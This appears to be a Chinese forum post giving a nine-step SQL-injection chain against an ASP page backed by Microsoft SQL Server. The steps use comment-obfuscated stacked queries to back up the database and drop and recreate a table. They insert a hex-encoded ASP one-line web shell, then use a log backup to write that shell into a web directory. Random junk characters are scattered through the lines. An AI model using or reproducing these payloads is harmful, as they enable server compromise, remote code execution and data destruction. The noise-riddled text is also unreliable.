第一步
{( R, \# G: y( b% q3 E* Zhttp://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--, u0 X, s, H6 Y7 B$ \
3 o2 ~, r1 a6 e& |# A# _ }) o第二步:
" v3 g, r9 V* ]2 F1 v: whttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--5 `; L& K1 u' C- l$ U* P" [
4 M/ @; h! m. Z# |- Z2 U第三步# E0 t1 X% C2 u( T. M+ \9 _
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
+ E# e# S# _% Z3 j7 s9 O3 o b3 `2 G* f
第四步
7 u. c8 }3 o: S w1 H c$ [http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
- _) t0 \6 O& o% g/ I, m. U+ f' H
第五步" o: k8 ?. `4 }& V5 Q
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
/ S2 B- l4 e/ v: j2 |' @
/ w1 W" o$ h# L% z% K8 R) F- `第六步
- _2 T/ W U7 h: hhttp://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--
) Z2 m6 n! T7 A
9 ?6 b8 s9 D- F- C& l第七步
( z' q! z# z( G# nhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--) c4 A/ d, o4 I& R, i
. y+ b" e* R1 q0 ]; `/ k
第八步" [ e7 f5 [) u% h% w9 H
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--* [/ B2 r4 L: d
( P* l+ n! z' e$ U& v0 c' @
第九步/ F: e' s; Z: _4 b/ t4 O- G; y; ?
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init-- ]$ R2 J9 z. {+ F
|